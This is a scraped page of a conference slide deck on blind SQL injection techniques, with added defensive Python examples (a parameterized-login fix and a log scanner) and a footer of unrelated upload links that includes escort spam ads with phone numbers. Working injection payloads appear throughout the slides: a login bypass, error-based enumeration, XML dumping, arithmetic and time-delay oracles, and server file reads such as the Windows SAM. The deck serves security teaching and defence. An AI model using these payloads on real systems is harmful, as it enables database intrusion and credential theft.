(Re) Playing with (Blind) SQL Injection
Chema Alonso, Informatica64, Microsoft MVP Enterprise Security

SQL Injection attacks
A long time ago, in a galaxy far, far away… http://www.phrack.org/issues.html?id=8&issue=54

Back in the 90s
Select id from users_table where login='$users' and passw='$password';
Login form: User [        ] Password [****************]

Back in the 90s
Select id from users_table where login='Admin' and passw='' or '1'='1';
Login form: User [Admin] Password [' or '1'='1]

Not everybody…

ODBC error messages
Username: ' having 1=1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Username: ' group by users.id having 1=1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
And so on…
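Added example, not code from the slides: the login query of the two previous slides built by string concatenation, next to the same query with bound parameters, on an in-memory SQLite database standing in for the deck's SQL Server back end (users_table, its single account row and the function names are all constructed for the demo). The bypass input from the slide matches a row against the concatenated query and nothing against the bound one; the safe version also keeps the driver's error text on the server instead of echoing it, which is what makes the ' having 1=1-- enumeration above possible. The last function applies the same rule to a numeric id, where the deck's arithmetic slides later show that wrapping the raw text in abs() inside the query is no protection: parse strictly before the value reaches SQL.

```python
"""Login query built by string concatenation beside its parameterized fix.

Added example, not code from the slides. An in-memory SQLite database stands
in for the SQL Server back end the deck uses; users_table and its single
account row are constructed sample data.
"""
import re
import sqlite3


def make_db():
    """Constructed users_table with one account, mirroring the slide's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users_table (id INTEGER PRIMARY KEY, login TEXT, passw TEXT)"
    )
    conn.execute("INSERT INTO users_table VALUES (1, 'Admin', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """The 1990s pattern: the submitted strings become part of the SQL text,
    so a password of  ' or '1'='1  rewrites the WHERE clause and matches."""
    sql = (
        "SELECT id FROM users_table WHERE login='" + user
        + "' AND passw='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so quotes in the input are only data."""
    sql = "SELECT id FROM users_table WHERE login=? AND passw=?"
    try:
        row = conn.execute(sql, (user, password)).fetchone()
    except sqlite3.Error:
        # Log the driver message server-side; never echo it to the client,
        # which is what turns a failed query into the ODBC schema leak above.
        return None
    return row[0] if row else None


INT_RE = re.compile(r"^-?\d+$")


def login_by_id_safe(conn, raw_id):
    """Numeric parameters get the same binding plus strict parsing up front.
    abs() around the raw text inside the query would still evaluate whatever
    arithmetic the client sent; rejecting anything that is not an integer
    leaves nothing to compute with."""
    if not INT_RE.match(raw_id.strip()):
        raise ValueError("id must be an integer")
    row = conn.execute(
        "SELECT login FROM users_table WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Admin", "' or '1'='1"))  # bypass: 1
    print(login_safe(db, "Admin", "' or '1'='1"))        # None
```

Running the file prints the bypassed lookup (1) for the concatenated query and None for the bound one; the same bypass string fails against login_safe because it is compared, quotes and all, with the stored password.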
Even security companies: Kaspersky

Agenda
- Serialized SQL Injection. Demo: XML Extractor
- Arithmetic SQL Injection: divide by zero, sums and subtractions, type overflow. Demo
- Remote File Downloading using Blind SQL Injection: SQL Server, MySQL, Oracle. Demo: RFD Tool
- Time-Based Blind SQL Injection using heavy queries. Demo: Marathon Tool
Serialized SQL Injection
Serialized SQL Injection
Goal: to merge complex result sets into a single showable field. XML serialization functions allow converting a result set into one XML string, so a big amount of data can be downloaded with single, simple injections.

SQL Server
FOR XML: retrieves data as a single string representing an XML tree.
- RAW: mandatory option. Shows the information converting each row of the result set into an XML element of the form <row />.
- BINARY BASE64: the query will fail if any column has a BINARY data type (images, passwords…) and this option is not explicitly specified.
union select '1','2','3',(select * from sysusers for xml raw, binary base64)
- XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.
Described by Dani Kachakil

MySQL
No default XML support, requires a server-side extension. GROUP_CONCAT (v4.1+)

Oracle
xmlforest, xmlelement, … No * support.
Demo: Serialized SQL Injection
Arithmetic Blind SQL Injection

Blind Attacks
The attacker injects code but can't access the data directly. However, the injection changes the behavior of the web application. The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection, Blind XPath Injection, Blind LDAP Injection

Blind SQL Injection Attacks
Attacker injects "true where clauses" and "false where clauses". Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
The program doesn't return any visible data from the database, nor data in error messages: the attacker can't see any data extracted from the database.

Blind SQL Injection Attacks
The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
- Different hashes
- Different HTML structure
- Different patterns (keywords)
- Different linear ASCII sums
- "Different behavior", for example response time

Blind SQL Injection Attacks
If any difference exists, the attacker can extract all the information from the database. How? Using "booleanization":
MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
"True-Answer Page" or "False-Answer Page"?
MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
Blind SQL Injection
Arithmetic Blind SQL Injection
The query forces the parameter to be numeric: SELECT field FROM table WHERE id=abs(param)
Ex: GetParam(ID); Select ….. Where att1=abs(ID); Select ….. Where att2=k1-ID; Print response
Boolean logic needs to be created with math operations.

Arithmetic Blind SQL Injection: divide by zero (David Litchfield)
Id=A+(1/(ASCII(B)-C))
A -> Param value originally used in the query.
B -> Value we are searching for, e.g. Substring(passwd,1,1)
C -> Counter [0..255]
When ASCII(B)=C, the DB will generate a divide-by-zero exception.

Arithmetic Blind SQL Injection: sums and subtractions
Id=A+ASCII(B)-C
A -> Param value originally used in the query.
B -> Value we are searching for, e.g. Substring(passwd,1,1)
C -> Counter [0..255]
When ASCII(B)=C, the response page of id=A+ASCII(B)-C will be the same as for id=A.

Arithmetic Blind SQL Injection: value type overflow
Id=A+((C/ASCII(B))*(K))
A -> Param value originally used in the query.
B -> Value we are searching for, e.g. Substring(passwd,1,1)
C -> Counter [0..255]
K -> Value that overflows the type defined for A (e.g. if A is an integer, then K=2^32)
When C/ASCII(B)==1, K*1 overflows the data type.

Demo: divide by zero, sums and subtractions, integer overflow
Remote File Downloading using Blind SQL Injection techniques

Accessing Files
Two ways:
- Load the file in a temp table and i>(select top 1 ASCII(Substring(column,pos,1)) from temp_table)??
- Load the file in the query: with every query the file is loaded in memory ("I am very sorry, engine") and i>ASCII(Substring(load_file(file),pos,1))??

SQL Server 2K - External Data Sources
Only for known file types, accessed through drivers: txt, csv, xls, mdb, log
And 200>ASCII(SUBSTRING((SELECT * FROM OPENROWSET('MSDASQL', 'Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:','select top 1 * from c:\dir\target.txt')),1,1))
Privileges: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0. By default this key doesn't exist, so only users with the Server Admin role can use these functions. NTFS permissions also apply.

SQL Server 2K – Bulk option
Access to any file:
; Create Table TempTable (row varchar(8000)) --
; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '', ROWTERMINATOR = '') --
; alter table TempTable add num int IDENTITY(1,1) NOT NULL --
and (select COUNT(row) from TempTable)
and (select top 1 len(row) from TempTable where num = rownum)
and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
; Drop Table TempTable --
Privileges needed: Server Role Bulkadmin; Database Role db_owner or db_ddladmin; NTFS permissions

SQL Server 2k5 – 2k8
OPENDATASOURCE and OPENROWSET supported; bulk options improved.
AND 256 > ASCII(SUBSTRING((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1)) --
Permissions: Bulkadmin Server Role; External Data Sources enabled (sp_configure, Surface Area Configuration tool for features)

MySQL
LoadFile: SELECT LOAD_FILE('/etc/passwd')
SQLbfTools: MySQLget command (illo and dab) http://www.reversing.org/node/view/11
Load Data infile:
; Create table C8DFC643 (datos varchar(4000))
; Load data infile 'c:\boot.ini' into table C8DFC643
; alter table C8DFC643 add column num integer auto_increment unique key
and (select count(num) from C8DFC643)
and (select length(datos) from C8DFC643 where num = 1)
and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
; Drop table C8DFC643

Oracle – Plain Text files
External Tables:
; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end; --
Only plain text files.

Oracle – DBMS_LOB
; execute immediate 'DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;' ; end; --
Demo: RFD

Time-based Blind SQL Injection using heavy queries

Time-Based Blind SQL Injection
In scenarios with no differences between the "True-Answer Page" and the "False-Answer Page", time delays can be used: the injection forces a delay in the response page when the injected condition is true.
- Delay functions: SQL Server: waitfor; Oracle: dbms_lock.sleep; MySQL: sleep or the Benchmark function; Postgres: pg_sleep
Ex: ; if (exists(select * from users)) waitfor delay '0:0:5'
Exploit for Solar Empire Web Game
Time-Based Blind SQL Injection
What about database engines without delay functions, i.e. MS Access, Oracle connections without PL/SQL support, DB2, etc.? Can we still perform Time-Based Blind SQL Injection attacks?
Yes, we can!
"Where-Clause" execution order
Select "whatever" From whatever Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?
The heavy condition first
The light condition first
Time-Based Blind SQL Injection using Heavy Queries
The attacker can delay the "True-Answer Page" using a heavy query. Whether this works depends on how the database engine evaluates the where clauses in the query. There are two types of database engines: databases without an optimization process and databases with an optimization process.

Time-Based Blind SQL Injection using Heavy Queries
The attacker can inject a heavy cross-join condition to delay the response page in true injections. The cross-join condition must be heavier than the other condition. The attacker only has to know or guess the name of a table with select permission in the database.
Example in MSSQL:
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

"Default" tables to construct a heavy query
- Microsoft SQL Server: sysusers
- Oracle: all_users
- MySQL (version 5): information_schema.columns
- Microsoft Access: MSysAccessObjects (97 & 2000 versions), MSysAccessStorage (2003 & 2007)

"Default" tables to construct a heavy query… or whatever you can guess: Clients, Customers, News, Logins, Users, Providers… Use your imagination…
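Added example, not from the slides and not part of Marathon Tool: a log scanner that flags the request shapes described in this section and in the blind and arithmetic sections before it, so a defender can spot the booleanization loop and the heavy-query delay in web server logs. The log lines are constructed in Apache combined format with the request duration in seconds as an extra last field; that field (%T in Apache, $request_time in nginx) and the rule that Program.php's id parameter must be an integer are assumptions about the logging and the application, not something the deck states.

```python
"""Access-log scan for the blind SQL injection request shapes the deck describes.

Added example: not code from the slides and not part of Marathon Tool. The log
lines below are constructed, in Apache combined format with the request
duration in seconds appended as a final field; that extra field and the rule
that the 'id' parameter must be an integer are assumptions about the
application and its logging.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample: one client walking through the deck's probe types against
# Program.php, plus one ordinary request from a second client.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Feb/2009:10:00:01 +0000] "GET /Program.php?id=1 HTTP/1.1" 200 5120 0.031
192.0.2.10 - - [12/Feb/2009:10:00:02 +0000] "GET /Program.php?id=1%20and%201=1 HTTP/1.1" 200 5120 0.030
192.0.2.10 - - [12/Feb/2009:10:00:03 +0000] "GET /Program.php?id=1%20and%201=2 HTTP/1.1" 200 4870 0.029
192.0.2.10 - - [12/Feb/2009:10:00:04 +0000] "GET /Program.php?id=1%20and%20100%3E(ASCII(Substring(user(),1,1))) HTTP/1.1" 200 5120 0.033
192.0.2.10 - - [12/Feb/2009:10:00:05 +0000] "GET /Program.php?id=1%2B(1/(ASCII(Substring(passwd,1,1))-65)) HTTP/1.1" 500 312 0.028
192.0.2.10 - - [12/Feb/2009:10:00:20 +0000] "GET /Program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2)%3E1 HTTP/1.1" 200 5120 14.2
198.51.100.7 - - [12/Feb/2009:10:00:21 +0000] "GET /Program.php?id=42 HTTP/1.1" 200 5133 0.030
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<secs>[\d.]+)$'
)
NUMERIC_PARAMS = {"id"}   # assumption: parameters the application treats as integers
SLOW_SECONDS = 5.0        # anything slower than this on a cheap endpoint is suspect
INT_RE = re.compile(r"^-?\d+$")
# Booleanization helpers, delay functions and 'and 1=1' style probes from the deck.
PROBE_RE = re.compile(
    r"ascii\(|substr(?:ing)?\(|waitfor|sleep\(|benchmark\(|pg_sleep|dbms_lock"
    r"|\bunion\b|\bselect\b|\b(?:and|or)\s+\d+\s*=\s*\d+",
    re.I,
)
# The heavy-query shape: the same table listed twice with aliases in one FROM.
CROSS_JOIN_RE = re.compile(r"\bfrom\s+(\w+)\s+as\s+\w+\s*,\s*\1\s+as\s+\w+", re.I)


def parse_line(line):
    """Split one access-log line into the fields the rules need, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "query": unquote(parts.query),
        "params": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "status": int(m.group("status")),
        "secs": float(m.group("secs")),
    }


def classify(rec):
    """Return the rule names one request trips (empty when it looks normal)."""
    findings = []
    for name in NUMERIC_PARAMS:
        value = rec["params"].get(name)
        if value is not None and not INT_RE.match(value.strip()):
            findings.append("non-numeric:" + name)  # arithmetic/boolean payloads live here
    if PROBE_RE.search(rec["query"]):
        findings.append("sql-probe")
    if rec["secs"] >= SLOW_SECONDS and CROSS_JOIN_RE.search(rec["query"]):
        findings.append("heavy-query")              # the time-based signal itself
    return findings


def scan(log_text):
    """Apply the rules to every line; return flagged records and a per-client tally."""
    flagged = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            flagged.append((rec["ip"], rec["path"], rec["secs"], hits))
            per_ip[rec["ip"]] += 1
    return flagged, per_ip


if __name__ == "__main__":
    for ip, path, secs, hits in scan(SAMPLE_LOG)[0]:
        print(f"{ip} {path} {secs:>6.2f}s {', '.join(hits)}")
```

The three rules are deliberately cheap: a non-integer value where an integer is expected catches the arithmetic and boolean payloads whatever functions they use, the token list catches the booleanization and delay helpers the deck lists, and the cross-join-plus-latency rule catches the heavy query even on an engine with no sleep function. The per-client tally matters more than any single hit, since extracting one string through booleanization takes hundreds of requests against the same path.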
Ex 1: MS SQL Server. Query takes 14 seconds -> True-Answer
Ex 1: MS SQL Server. Query takes 1 second -> False-Answer
Ex 2: Oracle. Query takes 22 seconds -> True-Answer
Ex 2: Oracle. Query takes 1 second -> False-Answer
Ex 3: Access 2007. Query takes 39 seconds -> True-Answer
Ex 3: Access 2007. Query takes 1 second -> False-Answer

Marathon Tool
Automates Time-Based Blind SQL Injection attacks using heavy queries in SQL Server, MySQL, MS Access and Oracle databases.
- Schema extraction from known databases
- Extract data using heavy queries no matter which database engine (without schema)
- Developed in .NET; source code available: http://www.codeplex.com/marathontool
Demo: Marathon Tool

SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Recently uploaded (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 

Playing With (B)Sqli

  • 1. (Re) Playing with (Blind) SQL Injection. Chema Alonso, Informatica64, Microsoft MVP Enterprise Security
  • 2. SQL Injection attacks: A long time ago, in a galaxy far, far away… http://www.phrack.org/issues.html?id=8&issue=54
  • 3. Back on the 90s: Select id from users_table where login='$users' and passw='$password'; Login form: User / Password: ****************
  • 4. Back on the 90s: Select id from users_table where login='Admin' and passw='' or '1'='1'; Login form: User: Admin / Password: ' or '1'='1
  • 6. ODBC Error messages Username: ' having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Username: ' group by users.id having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. And so on…
  • 8. Agenda: Serialized SQL Injection (Demo: XML Extractor); Arithmetic SQL Injection: Divide by Zero, Sums and subtractions, Type overflow (Demo); Remote File Downloading using Blind SQL Injection: SQL Server, MySQL, Oracle (Demo: RFD Tool); Time-Based Blind SQL Injection using heavy queries (Demo: Marathon Tool)
  • 10. Serialized SQL Injection. Goal: to merge complex result sets into a single showable field. XML serialization functions allow converting a result set into one XML string. It's possible to download a big amount of data with single and simple injections.
  • 11. SQL Server FOR XML: retrieves data as a single string representing an XML tree. RAW: mandatory option; shows the information converting each row of the result set into an XML element of the form <row />. BINARY BASE64: the query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. Described by Dani Kachakil
  • 12. MySQL: No default XML support, requires a server-side extension. GROUP_CONCAT (v 4.1+)
  • 14. Demo: Serialized SQL Injection
  • 16. Blind Attacks: The attacker injects code but can't access the data directly. However, this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection, Blind XPath Injection, Blind LDAP Injection
  • 17. Blind SQL Injection Attacks: The attacker injects "True where clauses" and "False where clauses". Ex: Program.php?id=1 and 1=1 / Program.php?id=1 and 1=2. The program doesn't return any visible data from the database or data in error messages. The attacker can't see any data extracted from the database.
  • 18. Blind SQL Injection Attacks: The attacker analyzes the response pages looking for differences between "True-Answer Page" and "False-Answer Page": different hashes, different HTML structure, different patterns (keywords), different linear ASCII sums, "different behavior", for example: response time
  • 19. Blind SQL Injection Attacks: If any difference exists, then the attacker can extract all information from the database. How? Using "booleanization". MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) "True-Answer Page" or "False-Answer Page"? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
  • 21. Arithmetic Blind SQL Injection: The query forces the parameter to be numeric. SELECT field FROM table WHERE id=abs(param) Ex: GetParam(ID); Select ….. Where att1=abs(ID); Select ….. Where att2=k1-ID; Print response. Boolean logic needs to be created with math operations.
  • 22. Arithmetic Blind SQL Injection: Divide by zero (David Litchfield). Id=A+(1/(ASCII(B)-C)) A -> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C -> Counter [0..255] When ASCII(B)=C, the DB will generate a divide by zero exception.
  • 23. Arithmetic Blind SQL Injection: Sums and subtractions. Id=A+ASCII(B)-C A -> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C -> Counter [0..255] When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
  • 24. Arithmetic Blind SQL Injection: Value type overflow. Id=A+((C/ASCII(B))*(K)) A -> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C -> Counter [0..255] K -> Value that overflows the type defined for A (e.g. if A is integer, then K=2^32) When C/ASCII(B)==1, K*1 overflows the data type
  • 25. Demo: Divide by zero, Sums and subtractions, Integer overflow
  • 27. Accessing Files. Two ways: Load the file in a temp table: and i>(select top 1 ASCII(Substring(column,pos,1)) from temp_table) ?? Load the file in the query: with every query the file is loaded in memory (I am very sorry, engine) and i>ASCII(Substring(load_file(file),pos,1)) ??
  • 28. SQL Server 2K - External Data Sources: Only for known file types, accessed through drivers: txt, csv, xls, mdb, log. And 200>ASCII(SUBSTRING((SELECT * FROM OPENROWSET('MSDASQL', 'Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\','select top 1 * from c:\dir\target.txt')),1,1)) Privileges: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0. By default this key doesn't exist, so only users with the Server Admin role can use these functions. NTFS permissions.
  • 29. SQL Server 2K – Bulk option: Access to any file. ; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '', ROWTERMINATOR = '') -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL -- and (select COUNT(row) from TempTable) and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable-- Privileges needed: Server Role: Bulkadmin; Database Role: db_owner or db_ddladmin; NTFS permissions
  • 30. SQL Server 2k5 – 2k8: OPENDATASOURCE and OPENROWSET supported. Bulk options improved. AND 256 > ASCII(SUBSTRING((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))-- Permissions: Bulkadmin Server Role; External Data Sources enabled (sp_configure, Surface Configuration Tool for features)
